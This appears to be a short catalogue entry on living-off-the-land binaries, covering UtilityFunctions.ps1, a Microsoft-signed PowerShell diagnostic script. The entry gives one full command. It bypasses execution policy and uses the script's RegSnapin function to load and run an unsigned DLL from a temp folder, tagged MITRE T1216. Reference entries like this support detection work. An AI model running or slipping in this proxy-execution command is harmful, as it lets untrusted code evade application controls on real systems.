.. /UtilityFunctions.ps1
Star

PowerShell Diagnostic Script


Paths:

Resources:
Acknowledgements:

Detection:

Execute

Proxy execute Managed DLL with PowerShell 
powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"
Usecase: Execute proxied payload with Microsoft signed binary
Privileges required: User
OS: Windows 10 21H1 (likely other versions as well), Windows 11
MITRE ATT&CK®: T1216